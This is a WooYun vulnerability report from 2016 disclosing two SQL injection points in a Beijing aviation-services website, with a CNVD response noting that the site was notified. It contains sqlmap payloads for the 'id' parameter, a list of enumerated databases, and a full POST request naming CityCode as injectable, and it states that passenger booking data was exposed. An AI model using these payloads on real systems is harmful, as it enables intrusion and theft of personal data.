当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0198192

漏洞标题:北京海华航空服务有限公司两个注入打包提交(涉及乘客敏感数据)

相关厂商:北京海华航空服务有限公司

漏洞作者: 路人甲

提交时间:2016-04-19 20:50

修复时间:2016-06-06 15:30

公开时间:2016-06-06 15:30

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:7

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-19: 细节已通知厂商并且等待厂商处理中
2016-04-22: 厂商已经确认,细节仅向厂商公开
2016-05-02: 细节向核心白帽子及相关领域专家公开
2016-05-12: 细节向普通白帽子公开
2016-05-22: 细节向实习白帽子公开
2016-06-06: 细节向公众公开

简要描述:

RT

详细说明:

注入一:

http://**.**.**.**:80/flight/view_xz.aspx?id=9


注入参数 id 

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y
sqlmap identified the following injection point(s) with a total of 54 HTTP(s) request
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=9 AND 2970=2970
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: id=9;WAITFOR DELAY '0:0:5'--
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: id=-4355 UNION ALL SELECT CHAR(113)+CHAR(118)+CHAR(107)+CHAR(107)+CHAR(1
---
[15:09:21] [INFO] testing Microsoft SQL Server
[15:09:21] [INFO] confirming Microsoft SQL Server
[15:09:22] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[15:09:22] [INFO] testing if current user is DBA
current user is DBA:    False
[15:09:22] [INFO] fetching database names
[15:09:22] [INFO] the SQL query used returns 12 entries
[15:09:22] [INFO] retrieved: AgentDB
[15:09:22] [INFO] retrieved: cmymall
[15:09:23] [INFO] retrieved: cyymall
[15:09:23] [INFO] retrieved: EMall
[15:09:23] [INFO] retrieved: ggtvisa_pek
[15:09:23] [INFO] retrieved: haihua_pek
[15:09:23] [INFO] retrieved: master
[15:09:23] [INFO] retrieved: model
[15:09:23] [INFO] retrieved: msdb
[15:09:23] [INFO] retrieved: phmall
[15:09:23] [INFO] retrieved: tempdb
[15:09:23] [INFO] retrieved: xhmall
available databases [12]:
[*] AgentDB
[*] cmymall
[*] cyymall
[*] EMall
[*] ggtvisa_pek
[*] haihua_pek
[*] master
[*] model
[*] msdb
[*] phmall
[*] tempdb
[*] xhmall


数据库:

11库.png


涉及乘客敏感数据 订房信息 航班 姓名 流水号等

数据量.png


数据.png


数据量较大
注入二:

POST /hotel/searchlist.aspx HTTP/1.1
Content-Length: 4430
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**:80/
Cookie: ASP.NET_SessionId=o0xqncikkbxpowepywua33q1
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
CheckInDate=01/01/1967&CheckOutDate=01/01/1967&CityCode=1&CityName=%e5%8c%97%e4%ba%ac&CityRegion=&hfMaxPrice=0&hfMinPrice=0&hfRank=&hfRoomNum=1&hotelid=&icityregion=San%20Francisco&PorName=&roomid=&txtHotelName=fqwnbsni&__EVENTVALIDATION=/wEdAA37b0eO4dRB4UUqB/4w4/pdZHMbe731eFAxuGvO9ZZ5ZZjeo/fMeTXf/QQiPkaixvAL0yspPcNhOVjUIIFayqSOvSPZXSSPF9R2TFrtv5QdaRUeYxuAVINbp58%2bLmZvWWe4Ltm82CeaLS2kIluHCSoRpwz8DLYyF0vx1oqMiiCqXQpWuJlIup7RXShjdkEB6dhdsH75TQ9b%2bD%2b5XWA7Ji/lhBYXRHobukEUNnQb5b%2bL6lvgu/%2bD2STGYjNLjccYZQgKTJ1RHDZtslr6RMNzYdMlyCH0X0ihRti4ONCc7CULX/hkWojwc%2bXeev%2bqP/umvpM%3d&__VIEWSTATE=/wEPDwUJLTI3NDgyMzIyD2QWAgIDD2QWDAIBD2QWCAIDDw8WAh4EVGV4dAUk5YyX5Lqs5rW35Y2O6Iiq56m65pyN5Yqh5pyJ6ZmQ5YWs5Y%2b4ZGQCBQ8PFgIfAAUMMDEwLTUxNjYyMzU1ZGQCCw8PZBYCHgdvbmNsaWNrBUxqYXZhc2NyaXB0OmFsZXJ0KCfnrqHnkIblkZjnpoHnlKjms6jlhows6K%2b355S16K%2bd6IGU57O75a6i5pyN5Luj5Li65rOo5YaMJyk7ZAINDxYCHwAF0AI8bGk%2bPGEgaHJlZj0iL0ZsaWdodC8iPuWbveWGheacuuelqDwvYT48aSBjbGFzcz0iaWNvMDIiPjwvaT48L2xpPjxsaT48YSBocmVmPSIvRmxpZ2h0X2ludC9nanRpY2tldHMuYXNweCI%2b5Zu96ZmF5py656WoPC9hPjxpIGNsYXNzPSJpY28wMyI%2bPC9pPjwvbGk%2bPGxpPjxhIGhyZWY9Ii9Ib3RlbC8iPuWbveWGhemFkuW6lzwvYT48aSBjbGFzcz0iaWNvMDQiPjwvaT48L2xpPjxsaT48YSBocmVmPSIvdmlzYS8iPuWbvemZheetvuivgTwvYT48aSBjbGFzcz0iaWNvMDUiPjwvaT48L2xpPjxsaT48YSBocmVmPSIvdHJhaW4vIj7ngavovabnpag8L2E%2bPGkgY2xhc3M9ImljbzA2Ij48L2k%2bPC9saT5kAh8PFgIfAAWTBSA8QSBjbGFzcz1jaGVjayAgb25jbGljaz1qYXZhc2NyaXB0OnNldGhvdGVscGFyYSgncmFuaycsJycpOyAgaHJlZj1qYXZhc2NyaXB0Ojs%2b5YWo6YOoPC9BPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPEEgICAgb25jbGljaz1qYXZhc2NyaXB0OnNldGhvdGVscGFyYSgncmFuaycsJzVBJyk7IGhyZWY9amF2YXNjcmlwdDo7PuS6lOaYn%2be6pzwvQT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxBICBvbmNsaWNrPWphdmFzY3JpcHQ6c2V0aG90ZWxwYXJhKCdyYW5rJywnNEEnKTsgaHJlZj1qYXZhc2NyaXB0Ojs%2b5Zub5pif57qnPC9BPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPEEgIG9uY2xpY2s9amF2YXNjcmlwdDpzZXRob3RlbHBhcmEoJ3JhbmsnLCczQScpOyAgaHJlZj1qYXZhc2NyaXB0Ojs%2b5LiJ5pif57qnPC9BPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPEEgb25jbGljaz1qYXZhc2NyaXB0OnNldGhvdGVscGFyYSgncmFuaycsJzJBJyk7ICBocmVmPWphdmFzY3JpcHQ6Oz7kuozmmJ/nuqc8L0E%2bIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPEEgb25jbGljaz1qYXZhc2NyaXB0OnNldGhvdGVscGFyYSgncmFuaycsJzFBJyk7ICBocmVmPWphdmFzY3JpcHQ6Oz7kuIDmmJ/nuqc8L0E%2bZAIhDxYCHwAFuAQgPEEgb25jbGljaz1qYXZhc2NyaXB0OnNldGhvdGVscGFyYSgncmFuaycsJzVTJyk7IGhyZWY9amF2YXNjcmlwdDo7PuS6lOWHhuaYn%2be6py/osarljY48L0E%2bDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8QSAgIG9uY2xpY2s9amF2YXNjcmlwdDpzZXRob3RlbHBhcmEoJ3JhbmsnLCc0UycpOyBocmVmPWphdmFzY3JpcHQ6Oz7lm5vlh4bmmJ/nuqcv6auY5qGjPC9BPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPEEgICBvbmNsaWNrPWphdmFzY3JpcHQ6c2V0aG90ZWxwYXJhKCdyYW5rJywnM1MnKTsgIGhyZWY9amF2YXNjcmlwdDo7PuS4ieWHhuaYn%2be6pzwvQT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxBICBvbmNsaWNrPWphdmFzY3JpcHQ6c2V0aG90ZWxwYXJhKCdyYW5rJywnMlMnKTsgIGhyZWY9amF2YXNjcmlwdDo7PuS6jOWHhuaYn%2be6pzwvQT4gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8QSAgb25jbGljaz1qYXZhc2NyaXB0OnNldGhvdGVscGFyYSgncmFuaycsJzFTJyk7ICBocmVmPWphdmFzY3JpcHQ6Oz7kuIDlh4bmmJ/nuqc8L0E%2bZAIjDxYCHwAF7wUgIDxBIGNsYXNzPWNoZWNrIG9uY2xpY2s9amF2YXNjcmlwdDpzZXRob3RlbHBhcmEoJ3JhdGUnLDAsMCk7ICBocmVmPWphdmFzY3JpcHQ6Oz7lhajpg6g8L0E%2bDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxBIG9uY2xpY2s9amF2YXNjcmlwdDpzZXRob3RlbHBhcmEoJ3JhdGUnLDEsMTUwKTsgaHJlZj1qYXZhc2NyaXB0Ojs%2bwqUxNTDku6XkuIs8L0E%2bDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxBICBvbmNsaWNrPWphdmFzY3JpcHQ6c2V0aG90ZWxwYXJhKCdyYXRlJywxNTEsMzAwKTsgIGhyZWY9amF2YXNjcmlwdDo7PsKlMTUxLTMwMDwvQT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPEEgIG9uY2xpY2s9amF2YXNjcmlwdDpzZXRob3RlbHBhcmEoJ3JhdGUnLDMwMSw0NTApOyAgaHJlZj1qYXZhc2NyaXB0Ojs%2bwqUzMDEtNDUwPC9BPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8QSBvbmNsaWNrPWphdmFzY3JpcHQ6c2V0aG90ZWxwYXJhKCdyYXRlJyw0NTEsNjAwKTsgIGhyZWY9amF2YXNjcmlwdDo7PsKlNDUxLTYwMDwvQT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPEEgb25jbGljaz1qYXZhc2NyaXB0OnNldGhvdGVscGFyYSgncmF0ZScsNjAxLDApOyBocmVmPWphdmFzY3JpcHQ6Oz7CpTYwMOS7peS4ijwvQT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZAInDxYCHwBlZAIpD2QWBgIBDw8WAh8ABTVDb3B5cmlnaHQgwqkgMjAxNCB3d3cuaC1oLmNvbS5jbiBhbGwgcmlnaHRzIHJlc2VydmVkLmRkAgMPDxYCHwAFNOWcsOWdgO%2b8muWMl%2bS6rOW4guS4nOWfjuWMuuWuieW%2bt%2bi3r%2beUsjEw5Y%2b3NS0xMDXlrqRkZAIFDw8WAh8ABRXnlLXor53vvJowMTAtNTE2NjIzNTVkZGQ/m30xxrIB2oaIjvZTY1s/inArXN8n7pub1MP3XwZgLg%3d%3d&__VIEWSTATEGENERATOR=41450651


注入参数 CityCode
注入结果:

12库.png


漏洞证明:

太慢 不跑了
数据量还是蛮大的

修复方案:

你懂的

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-04-22 15:28

厂商回复:

CNVD未复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。

最新状态:

暂无